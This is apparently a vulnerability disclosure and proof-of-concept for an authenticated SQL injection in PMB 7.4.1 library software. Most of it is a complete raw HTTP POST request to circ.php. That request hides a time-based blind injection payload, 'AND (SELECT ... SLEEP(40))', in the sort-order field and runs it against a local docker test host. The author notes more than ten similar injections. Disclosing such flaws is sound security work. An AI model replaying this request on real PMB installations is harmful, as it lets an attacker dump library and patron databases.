(clone of the original repository : https://github.com/jenaye/PMB)
- Description : Allow authenticated attacker to dump database from POST request
- Affected version : 7.4.1
To make this PoC, I just installed the software using docker (https://github.com/jperon/pmb/
)
and more than 10 injections like this one were currently found
- Vulnerability Type : SQL Injection ( Authentificated )
There is an exemple:
POST /pmb/circ.php?categ=listeresa&sub=encours HTTP/1.1
Host: 172.30.0.19
Content-Length: 1861
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.30.0.19
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.30.0.19/pmb/circ.php?categ=listeresa&sub=encours
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PhpMyBibli-OPACDB=bibli; PhpMyBibli-LOGIN=admin; PhpMyBibli-SESSNAME=PhpMyBibli; PhpMyBibli-SESSID=3846178265; PhpMyBibli-DATABASE=bibli; searchFieldsTreeSaveStateCookie=root%2Croot%2Fparent_3%2Croot%2Fparent_4%2Croot%2Fparent_5%2Croot%2Fparent_6%2Croot%2Fparent_1%2Croot%2Fparent_2; pmb3846178265=dr61h5606viek57uuvoboerjvh
Connection: close
reservations_circ_ui_montrerquoi=valid_noconf&reservations_circ_ui_expl_codestat=&reservations_circ_ui_expl_section=25&reservations_circ_ui_applied_sort[0][by]=record&reservations_circ_ui_applied_sort[0][asc_desc]= AND (SELECT 6646 FROM (SELECT(SLEEP(40)))xBfG)&reservations_circ_ui_applied_sort[1][by]=resa_date&reservations_circ_ui_applied_sort[1][asc_desc]=asc&reservations_circ_ui_json_filters={"id_notice":0,"id_bulletin":0,"id_empr":0,"montrerquoi":"all","f_loc":0,"empr_location":"","removal_location":"0","available_location":"","resa_state":"encours","expl_codestat":"","expl_codestats":[],"expl_section":"","expl_sections":[],"expl_statut":"","expl_statuts":[],"expl_type":"","expl_types":[],"expl_cote":"","expl_location":"","expl_locations":[],"groups":[],"resa_condition":"","resa_loc_retrait":"","resa_loc":0,"ids":""}&reservations_circ_ui_json_selected_columns={"record":"233","expl_cote":"296","empr":"empr_nom_prenom","empr_location":"editions_datasource_empr_location","rank":"366","resa_date":"374","resa_condition":"resa_condition","resa_date_fin":"resa_date_fin_td","resa_validee":"resa_validee","resa_confirmee":"resa_confirmee"}&reservations_circ_ui_json_applied_group=[""]&reservations_circ_ui_json_applied_sort=[{"by":"record","asc_desc":"asc"},{"by":"resa_date","asc_desc":"asc"}]&reservations_circ_ui_page=1&reservations_circ_ui_nb_per_page=40&reservations_circ_ui_pager={"page":1,"nb_per_page":40,"nb_per_page_on_group":false,"nb_results":0,"nb_page":1,"all_on_page":false,"allow_force_all_on_page":true}&reservations_circ_ui_selected_filters={"montrerquoi":"empr_etat_resa_query","expl_codestat":"editions_datasource_expl_codestat","expl_section":"editions_datasource_expl_section"}&reservations_circ_ui_ancre=&reservations_circ_ui_go_directly_to_ancre=&reservations_circ_ui_initialization=&reservations_circ_ui_applied_action=apply